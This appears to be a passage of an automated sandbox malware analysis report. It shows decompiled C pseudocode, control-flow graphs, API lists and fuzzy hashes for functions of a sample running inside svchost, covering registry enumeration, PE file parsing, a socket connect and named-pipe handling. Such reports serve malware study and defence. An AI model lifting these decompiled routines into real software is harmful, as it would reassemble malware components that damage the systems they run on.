                                                                                                                                  0x025177ec
                                                                                                                                  0x025177ef
                                                                                                                                  0x00000000
                                                                                                                                  0x025177f5
                                                                                                                                  0x0251751c
                                                                                                                                  0x02517521
                                                                                                                                  0x02517528
                                                                                                                                  0x02517530
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517536
                                                                                                                                  0x0251753c
                                                                                                                                  0x0251753f
                                                                                                                                  0x0251753f
                                                                                                                                  0x02517541
                                                                                                                                  0x02517542
                                                                                                                                  0x0251754b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251755f
                                                                                                                                  0x02517565
                                                                                                                                  0x02517566
                                                                                                                                  0x0251756b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517589
                                                                                                                                  0x0251758e
                                                                                                                                  0x02517593
                                                                                                                                  0x02517753
                                                                                                                                  0x00000000
                                                                                                                                  0x02517753
                                                                                                                                  0x025175a0
                                                                                                                                  0x025175d1
                                                                                                                                  0x025175d7
                                                                                                                                  0x025175a2
                                                                                                                                  0x025175b0
                                                                                                                                  0x025175be
                                                                                                                                  0x025175c3
                                                                                                                                  0x025175c3
                                                                                                                                  0x025175da
                                                                                                                                  0x025175dc
                                                                                                                                  0x025175dc
                                                                                                                                  0x025175fc
                                                                                                                                  0x02517615
                                                                                                                                  0x02517618
                                                                                                                                  0x0251761d
                                                                                                                                  0x02517620
                                                                                                                                  0x02517623
                                                                                                                                  0x02517626
                                                                                                                                  0x02517626
                                                                                                                                  0x02517628
                                                                                                                                  0x02517629
                                                                                                                                  0x0251762d
                                                                                                                                  0x02517632
                                                                                                                                  0x02517634
                                                                                                                                  0x02517634
                                                                                                                                  0x02517637
                                                                                                                                  0x02517637
                                                                                                                                  0x02517639
                                                                                                                                  0x0251763a
                                                                                                                                  0x0251763e
                                                                                                                                  0x02517642
                                                                                                                                  0x0251765c
                                                                                                                                  0x02517664
                                                                                                                                  0x02517667
                                                                                                                                  0x0251766e
                                                                                                                                  0x02517673
                                                                                                                                  0x02517680
                                                                                                                                  0x02517675
                                                                                                                                  0x0251767b
                                                                                                                                  0x0251767b
                                                                                                                                  0x0251768e
                                                                                                                                  0x02517722
                                                                                                                                  0x00000000
                                                                                                                                  0x02517694
                                                                                                                                  0x025176a1
                                                                                                                                  0x025176ad
                                                                                                                                  0x025176b3
                                                                                                                                  0x025176bf
                                                                                                                                  0x025176d8
                                                                                                                                  0x025176d8
                                                                                                                                  0x025176dd
                                                                                                                                  0x025176dd
                                                                                                                                  0x00000000
                                                                                                                                  0x025176dd
                                                                                                                                  0x025176c1
                                                                                                                                  0x025176c7
                                                                                                                                  0x00000000
                                                                                                                                  0x0251777e
                                                                                                                                  0x02517785
                                                                                                                                  0x02517797
                                                                                                                                  0x02517799
                                                                                                                                  0x02517799
                                                                                                                                  0x0251779a
                                                                                                                                  0x0251779f
                                                                                                                                  0x025177a1
                                                                                                                                  0x025177a1
                                                                                                                                  0x025177a3
                                                                                                                                  0x025177a8
                                                                                                                                  0x025177b3
                                                                                                                                  0x025177b8
                                                                                                                                  0x025177c0
                                                                                                                                  0x025177c0
                                                                                                                                  0x025177c8
                                                                                                                                  0x025177d0
                                                                                                                                  0x025177d6
                                                                                                                                  0x025177d7
                                                                                                                                  0x025177dc
                                                                                                                                  0x025177de
                                                                                                                                  0x025177de
                                                                                                                                  0x025177e0
                                                                                                                                  0x025177e2
                                                                                                                                  0x00000000
                                                                                                                                  0x025177e2
                                                                                                                                  0x025176c7
                                                                                                                                  0x02517769
                                                                                                                                  0x02517773
                                                                                                                                  0x025177e3
                                                                                                                                  0x025177e6
                                                                                                                                  0x00000000
                                                                                                                                  0x025177e6
                                                                                                                                  0x02517642
                                                                                                                                  0x02517717
                                                                                                                                  0x02517801
                                                                                                                                  0x00000000
                                                                                                                                  0x02517801

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,761B43E0,00000000), ref: 02517472
                                                                                                                                  • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000101,?,?,?,?,?,?,?,761B43E0,00000000), ref: 025174F0
                                                                                                                                  • RegQueryValueExA.KERNEL32(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,761B43E0,00000000), ref: 02517528
                                                                                                                                  • ___ascii_stricmp.LIBCMT ref: 0251764D
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,761B43E0,00000000), ref: 025176E7
                                                                                                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 02517706
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,761B43E0,00000000), ref: 02517717
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,761B43E0,00000000), ref: 02517745
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,761B43E0,00000000), ref: 025177EF
                                                                                                                                    • Part of subcall function 0251F1A5: lstrlenA.KERNEL32(000000C8,000000E4,025222F8,000000C8,02517150,?), ref: 0251F1AD
                                                                                                                                  • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0251778F
                                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 025177E6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                                                                  • String ID: "
                                                                                                                                  • API String ID: 3433985886-123907689
                                                                                                                                  • Opcode ID: 6bebcaef6663bdddc9040775c6bcb52350b12c6091c36766004fa7e7bb8f45d0
                                                                                                                                  • Instruction ID: aed274d2402152468edf163d97287ac90788807e36a224d5203a5f502a54ac87
                                                                                                                                  • Opcode Fuzzy Hash: 6bebcaef6663bdddc9040775c6bcb52350b12c6091c36766004fa7e7bb8f45d0
                                                                                                                                  • Instruction Fuzzy Hash: 56C1727194021AABFB219FA8DC45FEEBBBAFF49310F140495E504E6190EB719A44CB68
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251675C Relevance: 19.7, APIs: 13, Instructions: 199fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1122 251675c-2516778 1123 2516784-25167a2 CreateFileA 1122->1123 1124 251677a-251677e SetFileAttributesA 1122->1124 1125 25167b5-25167b8 1123->1125 1126 25167a4-25167b2 CreateFileA 1123->1126 1124->1123 1127 25167c5-25167c9 1125->1127 1128 25167ba-25167bf SetFileAttributesA 1125->1128 1126->1125 1129 2516977-2516986 1127->1129 1130 25167cf-25167df GetFileSize 1127->1130 1128->1127 1131 25167e5-25167e7 1130->1131 1132 251696b 1130->1132 1131->1132 1133 25167ed-251680b ReadFile 1131->1133 1134 251696e-2516971 FindCloseChangeNotification 1132->1134 1133->1132 1135 2516811-2516824 SetFilePointer 1133->1135 1134->1129 1135->1132 1136 251682a-2516842 ReadFile 1135->1136 1136->1132 1137 2516848-2516861 SetFilePointer 1136->1137 1137->1132 1138 2516867-2516876 1137->1138 1139 25168d5-25168df 1138->1139 1140 2516878-251688f ReadFile 1138->1140 1139->1134 1141 25168e5-25168eb 1139->1141 1142 2516891-251689e 1140->1142 1143 25168d2 1140->1143 1144 25168f0-25168fe call 251ebcc 1141->1144 1145 25168ed 1141->1145 1146 25168a0-25168b5 1142->1146 1147 25168b7-25168ba 1142->1147 1143->1139 1144->1132 1153 2516900-251690b SetFilePointer 1144->1153 1145->1144 1149 25168bd-25168c3 1146->1149 1147->1149 1151 25168c5 1149->1151 1152 25168c8-25168ce 1149->1152 1151->1152 1152->1140 1154 25168d0 1152->1154 1155 251695a-2516969 call 251ec2e 1153->1155 1156 251690d-2516920 ReadFile 1153->1156 1154->1139 1155->1134 1156->1155 1157 2516922-2516958 1156->1157 1157->1134
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251675C(CHAR* _a4, long* _a8, long _a12) {
				long _v8;
				void* _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				struct _OVERLAPPED* _v24;
				long _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v60;
				void _v68;
				long _v72;
				void _v132;
				intOrPtr _v320;
				signed int _v360;
				signed int _v374;
				void _v380;
				void* _t85;
				long _t88;
				int _t92;
				long _t93;
				int _t96;
				long _t99;
				long _t102;
				struct _OVERLAPPED* _t103;
				long _t104;
				long _t115;
				long _t120;
				signed int _t143;
				void* _t146;

				_v16 = 0;
				_v8 = 0;
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 0x80);
				}
				_t85 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
				_v12 = _t85;
				if(_t85 == 0xffffffff) {
					_v12 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 4, 0);
				}
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 2);
				}
				if(_v12 != 0xffffffff) {
					_t88 = GetFileSize(_v12, 0);
					_v8 = _t88;
					if(_t88 == 0xffffffff || _t88 == 0) {
						L31:
						_v8 = 0;
					} else {
						_a12 = 0;
						_v28 = 0;
						_t92 = ReadFile(_v12,  &_v132, 0x40,  &_a12, 0); // executed
						if(_t92 == 0) {
							goto L31;
						} else {
							_t93 = SetFilePointer(_v12, _v72, 0, 0); // executed
							if(_t93 == 0xffffffff) {
								goto L31;
							} else {
								_t96 = ReadFile(_v12,  &_v380, 0xf8,  &_v28, 0); // executed
								if(_t96 == 0) {
									goto L31;
								} else {
									_t99 = SetFilePointer(_v12, (_v360 & 0x0000ffff) + _v72 + 0x18, 0, 0); // executed
									if(_t99 == 0xffffffff) {
										goto L31;
									} else {
										_v20 = 0;
										_v24 = 0;
										if(0 < _v374) {
											while(1) {
												_t115 = 0x28;
												_a12 = _t115;
												if(ReadFile(_v12,  &_v68, _t115,  &_a12, 0) == 0) {
													break;
												}
												_t143 = _v374 & 0x0000ffff;
												if(_v24 != _t143 - 1) {
													_t120 = _v48 + _v52;
												} else {
													_t120 = (_v320 + _v60 - 0x00000001 &  !(_v320 - 1)) + _v48;
												}
												_a12 = _t120;
												if(_v20 < _t120) {
													_v20 = _t120;
												}
												_v24 = _v24 + 1;
												if(_v24 < _t143) {
													continue;
												} else {
												}
												goto L23;
											}
											_v8 = 0;
										}
										L23:
										if(_v24 >= (_v374 & 0x0000ffff)) {
											_t102 = _v20;
											if(_v8 > _t102) {
												_v8 = _t102;
											}
											_t103 = E0251EBCC(_v8);
											_v16 = _t103;
											if(_t103 == 0) {
												goto L31;
											} else {
												_t104 = SetFilePointer(_v12, 0, 0, 0); // executed
												if(_t104 == 0xffffffff) {
													L30:
													_v8 = 0;
													E0251EC2E(_v16);
													_v16 = 0;
												} else {
													_t146 = _v16;
													if(ReadFile(_v12, _t146, _v8,  &_v20, 0) == 0) {
														goto L30;
													} else {
														 *(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 0x10) =  *((intOrPtr*)(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 8)) + _v320 - 0x00000001 &  !(_v320 - 1);
														_v8 = _v20;
													}
												}
											}
										}
									}
								}
							}
						}
					}
					FindCloseChangeNotification(_v12); // executed
				}
				 *_a8 = _v8;
				return _v16;
			}
































                                                                                                                                  0x0251676a
                                                                                                                                  0x0251676d
                                                                                                                                  0x02516778
                                                                                                                                  0x0251677e
                                                                                                                                  0x0251677e
                                                                                                                                  0x0251679a
                                                                                                                                  0x0251679c
                                                                                                                                  0x025167a2
                                                                                                                                  0x025167b2
                                                                                                                                  0x025167b2
                                                                                                                                  0x025167b8
                                                                                                                                  0x025167bf
                                                                                                                                  0x025167bf
                                                                                                                                  0x025167c9
                                                                                                                                  0x025167d3
                                                                                                                                  0x025167d9
                                                                                                                                  0x025167df
                                                                                                                                  0x0251696b
                                                                                                                                  0x0251696b
                                                                                                                                  0x025167ed
                                                                                                                                  0x02516801
                                                                                                                                  0x02516804
                                                                                                                                  0x02516807
                                                                                                                                  0x0251680b
                                                                                                                                  0x00000000
                                                                                                                                  0x02516811
                                                                                                                                  0x0251681f
                                                                                                                                  0x02516824
                                                                                                                                  0x00000000
                                                                                                                                  0x0251682a
                                                                                                                                  0x0251683e
                                                                                                                                  0x02516842
                                                                                                                                  0x00000000
                                                                                                                                  0x02516848
                                                                                                                                  0x0251685c
                                                                                                                                  0x02516861
                                                                                                                                  0x00000000
                                                                                                                                  0x02516867
                                                                                                                                  0x02516869
                                                                                                                                  0x0251686c
                                                                                                                                  0x02516876
                                                                                                                                  0x02516878
                                                                                                                                  0x0251687a
                                                                                                                                  0x02516881
                                                                                                                                  0x0251688f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02516891
                                                                                                                                  0x0251689e
                                                                                                                                  0x025168ba
                                                                                                                                  0x025168a0
                                                                                                                                  0x025168b2
                                                                                                                                  0x025168b2
                                                                                                                                  0x025168bd
                                                                                                                                  0x025168c3
                                                                                                                                  0x025168c5
                                                                                                                                  0x025168c5
                                                                                                                                  0x025168c8
                                                                                                                                  0x025168ce
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025168d0
                                                                                                                                  0x00000000
                                                                                                                                  0x025168ce
                                                                                                                                  0x025168d2
                                                                                                                                  0x025168d2
                                                                                                                                  0x025168d5
                                                                                                                                  0x025168df
                                                                                                                                  0x025168e5
                                                                                                                                  0x025168eb
                                                                                                                                  0x025168ed
                                                                                                                                  0x025168ed
                                                                                                                                  0x025168f3
                                                                                                                                  0x025168f9
                                                                                                                                  0x025168fe
                                                                                                                                  0x00000000
                                                                                                                                  0x02516900
                                                                                                                                  0x02516906
                                                                                                                                  0x0251690b
                                                                                                                                  0x0251695a
                                                                                                                                  0x0251695d
                                                                                                                                  0x02516960
                                                                                                                                  0x02516966
                                                                                                                                  0x0251690d
                                                                                                                                  0x0251690d
                                                                                                                                  0x02516920
                                                                                                                                  0x00000000
                                                                                                                                  0x02516922
                                                                                                                                  0x0251694f
                                                                                                                                  0x02516955
                                                                                                                                  0x02516955
                                                                                                                                  0x02516920
                                                                                                                                  0x0251690b
                                                                                                                                  0x025168fe
                                                                                                                                  0x025168df
                                                                                                                                  0x02516861
                                                                                                                                  0x02516842
                                                                                                                                  0x02516824
                                                                                                                                  0x0251680b
                                                                                                                                  0x02516971
                                                                                                                                  0x02516971
                                                                                                                                  0x0251697f
                                                                                                                                  0x02516986

                                                                                                                                  APIs
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080,?,761B43E0,00000000), ref: 0251677E
                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,761B43E0,00000000), ref: 0251679A
                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,761B43E0,00000000), ref: 025167B0
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000002,?,761B43E0,00000000), ref: 025167BF
                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000,?,761B43E0,00000000), ref: 025167D3
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,00000040,02518244,00000000,?,761B43E0,00000000), ref: 02516807
                                                                                                                                  • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0251681F
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,761B43E0,00000000), ref: 0251683E
                                                                                                                                  • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0251685C
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,00000028,02518244,00000000,?,761B43E0,00000000), ref: 0251688B
                                                                                                                                  • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000,?,761B43E0,00000000), ref: 02516906
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,00000000,02518244,00000000,?,761B43E0,00000000), ref: 0251691C
                                                                                                                                  • FindCloseChangeNotification.KERNEL32(000000FF,?,761B43E0,00000000), ref: 02516971
                                                                                                                                    • Part of subcall function 0251EC2E: GetProcessHeap.KERNEL32(00000000,0251EA27,00000000,0251EA27,00000000), ref: 0251EC41
                                                                                                                                    • Part of subcall function 0251EC2E: RtlFreeHeap.NTDLL(00000000), ref: 0251EC48
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Read$Pointer$AttributesCreateHeap$ChangeCloseFindFreeNotificationProcessSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1400801100-0
                                                                                                                                  • Opcode ID: e4cceb5c0d82371220f4e758d583077034de376c396091e7a9a5d5cea4ba97a4
                                                                                                                                  • Instruction ID: da00143cb86416de5b2661fe0a4f5ef79ef296cc66543fc35c01ba4bb165c7dc
                                                                                                                                  • Opcode Fuzzy Hash: e4cceb5c0d82371220f4e758d583077034de376c396091e7a9a5d5cea4ba97a4
                                                                                                                                  • Instruction Fuzzy Hash: 4A711671D0021EEFEF159FA4CC80AEEBBB9FB04314F10456AE915A6190E7309E56DF64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251F315 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 103networkCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1160 251f315-251f332 1161 251f334-251f336 1160->1161 1162 251f33b-251f372 call 251ee2a htons socket 1160->1162 1163 251f424-251f427 1161->1163 1166 251f382-251f39b ioctlsocket 1162->1166 1167 251f374-251f37d closesocket 1162->1167 1168 251f3aa-251f3f0 connect select 1166->1168 1169 251f39d 1166->1169 1167->1163 1171 251f421 1168->1171 1172 251f3f2-251f401 __WSAFDIsSet 1168->1172 1170 251f39f-251f3a8 closesocket 1169->1170 1173 251f423 1170->1173 1171->1173 1172->1170 1174 251f403-251f416 ioctlsocket call 251f26d 1172->1174 1173->1163 1176 251f41b-251f41f 1174->1176 1176->1173
                                                                                                                                  APIs
                                                                                                                                  • htons.WS2_32(0251CA1D), ref: 0251F34D
                                                                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 0251F367
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 0251F375
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: closesockethtonssocket
                                                                                                                                  • String ID: time_cfg
                                                                                                                                  • API String ID: 311057483-2401304539
                                                                                                                                  • Opcode ID: 6a46f51e57ecb510e4e1ebe57eb4700f90909448c582d86addc240129932664f
                                                                                                                                  • Instruction ID: 7bf7bb4a0a74d44bbf8b8e0c5136ce26469de4aebc0b1c75a010a14ccf65aa90
                                                                                                                                  • Opcode Fuzzy Hash: 6a46f51e57ecb510e4e1ebe57eb4700f90909448c582d86addc240129932664f
                                                                                                                                  • Instruction Fuzzy Hash: C9318F72941219AFEB10DFA4EC85DEE7BBCFF89310F104566F915D3180E7709A458BA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251405E Relevance: 16.7, APIs: 11, Instructions: 203COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1177 251405e-251407b CreateEventA 1178 2514084-25140a8 call 2513ecd call 2514000 1177->1178 1179 251407d-2514081 1177->1179 1184 2514130-251413e call 251ee2a 1178->1184 1185 25140ae-25140be call 251ee2a 1178->1185 1190 251413f-2514165 call 2513ecd CreateNamedPipeA 1184->1190 1185->1184 1191 25140c0-25140f1 call 251eca5 call 2513f18 call 2513f8c 1185->1191 1196 2514167-2514174 Sleep 1190->1196 1197 2514188-2514193 ConnectNamedPipe 1190->1197 1208 25140f3-25140ff 1191->1208 1209 2514127-251412a CloseHandle 1191->1209 1196->1190 1201 2514176-2514182 CloseHandle 1196->1201 1199 2514195-25141a5 GetLastError 1197->1199 1200 25141ab-25141c0 call 2513f8c 1197->1200 1199->1200 1203 251425e-2514265 DisconnectNamedPipe 1199->1203 1200->1197 1210 25141c2-25141f2 call 2513f18 call 2513f8c 1200->1210 1201->1197 1203->1197 1208->1209 1211 2514101-2514121 call 2513f18 ExitProcess 1208->1211 1209->1184 1210->1203 1218 25141f4-2514200 1210->1218 1218->1203 1219 2514202-2514215 call 2513f8c 1218->1219 1219->1203 1222 2514217-251421b 1219->1222 1222->1203 1223 251421d-2514230 call 2513f8c 1222->1223 1223->1203 1226 2514232-2514236 1223->1226 1226->1197 1227 251423c-2514251 call 2513f18 1226->1227 1230 2514253-2514259 1227->1230 1231 251426a-2514276 CloseHandle * 2 call 251e318 1227->1231 1230->1197 1233 251427b 1231->1233 1233->1233
                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E0251405E(void* __ecx) {
				unsigned int _v8;
				unsigned int _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v40;
				void* _t40;
				void* _t43;
				void* _t46;
				int _t47;
				void* _t49;
				void* _t56;
				void* _t62;
				void* _t64;
				long _t71;
				void* _t82;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t104;

				_t95 = __ecx;
				_v8 = 0;
				_t40 = CreateEventA(0, 1, 1, 0);
				_v16 = _t40;
				if(_t40 != 0) {
					_t43 = E02514000(E02513ECD(_t95),  &_v20);
					_t97 = _t98;
					_t102 = 0x7d0;
					_t92 = 0x100;
					_t99 = 0x25222f8;
					if(_t43 == 0) {
						L10:
						E0251EE2A(_t97, _t99, 0, _t92);
						_t104 = _t103 + 0xc;
						_t93 = 0xa;
						while(1) {
							_t93 = _t93 - 1;
							_t46 = CreateNamedPipeA(E02513ECD(_t97), 0x40000003, 0, 0xff, 0x64, 0x64, 0x64, 0); // executed
							_t99 = _t46;
							if(_t99 != 0xffffffff) {
								goto L14;
							}
							Sleep(0x1f4);
							if(_t93 != 0) {
								continue;
							}
							CloseHandle(_v16);
							return 0;
						}
						while(1) {
							L14:
							_t47 = ConnectNamedPipe(_t99, 0); // executed
							if(_t47 != 0) {
								goto L16;
							}
							L15:
							_t71 = GetLastError();
							asm("sbb eax, eax");
							if( ~(_t71 - 0x217) + 1 == 0) {
								L25:
								DisconnectNamedPipe(_t99);
								continue;
								do {
									while(1) {
										L14:
										_t47 = ConnectNamedPipe(_t99, 0); // executed
										if(_t47 != 0) {
											goto L16;
										}
										goto L15;
									}
									L22:
								} while (_v28 != 1);
								E02513F18(_t99,  &_v8, 4, _t92, _t102);
								_t103 = _t104 + 0x14;
								if(_v32 == 0) {
									_t102 = CloseHandle;
									CloseHandle(_t99);
									CloseHandle(_t92);
									E0251E318();
									L8:
									ExitProcess(0);
								}
								 *0x252215a =  *0x252215a + 1;
								do {
									L14:
									_t47 = ConnectNamedPipe(_t99, 0); // executed
									if(_t47 != 0) {
										goto L16;
									}
									goto L15;
								} while (_t49 == 0);
								_t92 = _v16;
								_v8 = (_v12 >> 2) + _v12;
								E02513F18(_t99,  &_v8, 4, _t92, _t102);
								_t56 = E02513F8C(_t99,  &_v12, 4, _t92, _t102);
								_t104 = _t104 + 0x28;
								if(_t56 == 0 || _v12 != (_v8 >> 2) + _v8) {
									goto L25;
								} else {
									_t62 = E02513F8C(_t99,  &_v28, 8, _t92, _t102);
									_t104 = _t104 + 0x14;
									if(_t62 == 0 || _v24 != 0xc) {
										goto L25;
									} else {
										_t64 = E02513F8C(_t99,  &_v40, 0xc, _t92, _t102);
										_t104 = _t104 + 0x14;
										if(_t64 == 0) {
											goto L25;
										}
										goto L22;
									}
								}
							}
							L16:
							_t49 = E02513F8C(_t99,  &_v12, 4, _v16, _t102);
							_t104 = _t104 + 0x14;
						}
					}
					E0251EE2A(_t97, 0x25222f8, 0, 0x100);
					_t103 = _t103 + 0xc;
					if(_v20 == 0xffffffff) {
						goto L10;
					}
					_v12 = E0251ECA5();
					E02513F18(_v20,  &_v12, 4, _v16, 0x7d0);
					_t82 = E02513F8C(_v20,  &_v8, 4, _v16, 0x7d0);
					_t103 = _t103 + 0x28;
					if(_t82 == 0 || _v8 != (_v12 >> 2) + _v12) {
						CloseHandle(_v20);
						goto L10;
					} else {
						_v8 = _v8 + (_v8 >> 2);
						E02513F18(_v20,  &_v8, 4, _v16, 0x7d0);
						_t103 = _t103 + 0x14;
						goto L8;
					}
				}
				return 0;
			}





























                                                                                                                                  0x0251405e
                                                                                                                                  0x0251406d
                                                                                                                                  0x02514070
                                                                                                                                  0x02514076
                                                                                                                                  0x0251407b
                                                                                                                                  0x02514090
                                                                                                                                  0x02514096
                                                                                                                                  0x02514097
                                                                                                                                  0x0251409c
                                                                                                                                  0x025140a1
                                                                                                                                  0x025140a8
                                                                                                                                  0x02514130
                                                                                                                                  0x02514134
                                                                                                                                  0x02514139
                                                                                                                                  0x0251413e
                                                                                                                                  0x0251413f
                                                                                                                                  0x02514153
                                                                                                                                  0x0251415a
                                                                                                                                  0x02514160
                                                                                                                                  0x02514165
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251416c
                                                                                                                                  0x02514174
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02514179
                                                                                                                                  0x00000000
                                                                                                                                  0x02514182
                                                                                                                                  0x02514188
                                                                                                                                  0x02514188
                                                                                                                                  0x0251418b
                                                                                                                                  0x02514193
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02514195
                                                                                                                                  0x02514195
                                                                                                                                  0x025141a2
                                                                                                                                  0x025141a5
                                                                                                                                  0x0251425e
                                                                                                                                  0x0251425f
                                                                                                                                  0x02514265
                                                                                                                                  0x02514188
                                                                                                                                  0x02514188
                                                                                                                                  0x02514188
                                                                                                                                  0x0251418b
                                                                                                                                  0x02514193
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02514193
                                                                                                                                  0x02514232
                                                                                                                                  0x02514232
                                                                                                                                  0x02514245
                                                                                                                                  0x0251424a
                                                                                                                                  0x02514251
                                                                                                                                  0x0251426a
                                                                                                                                  0x02514271
                                                                                                                                  0x02514274
                                                                                                                                  0x02514276
                                                                                                                                  0x0251411f
                                                                                                                                  0x02514121
                                                                                                                                  0x02514121
                                                                                                                                  0x02514253
                                                                                                                                  0x02514188
                                                                                                                                  0x02514188
                                                                                                                                  0x0251418b
                                                                                                                                  0x02514193
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02514193
                                                                                                                                  0x025141c5
                                                                                                                                  0x025141d0
                                                                                                                                  0x025141da
                                                                                                                                  0x025141e8
                                                                                                                                  0x025141ed
                                                                                                                                  0x025141f2
                                                                                                                                  0x00000000
                                                                                                                                  0x02514202
                                                                                                                                  0x0251420b
                                                                                                                                  0x02514210
                                                                                                                                  0x02514215
                                                                                                                                  0x00000000
                                                                                                                                  0x0251421d
                                                                                                                                  0x02514226
                                                                                                                                  0x0251422b
                                                                                                                                  0x02514230
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02514230
                                                                                                                                  0x02514215
                                                                                                                                  0x025141f2
                                                                                                                                  0x025141ab
                                                                                                                                  0x025141b6
                                                                                                                                  0x025141bb
                                                                                                                                  0x025141be
                                                                                                                                  0x02514188
                                                                                                                                  0x025140b2
                                                                                                                                  0x025140b7
                                                                                                                                  0x025140be
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025140c9
                                                                                                                                  0x025140d5
                                                                                                                                  0x025140e7
                                                                                                                                  0x025140ec
                                                                                                                                  0x025140f1
                                                                                                                                  0x0251412a
                                                                                                                                  0x00000000
                                                                                                                                  0x02514101
                                                                                                                                  0x0251410b
                                                                                                                                  0x02514117
                                                                                                                                  0x0251411c
                                                                                                                                  0x00000000
                                                                                                                                  0x0251411c
                                                                                                                                  0x025140f1
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 02514070
                                                                                                                                  • ExitProcess.KERNEL32 ref: 02514121
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
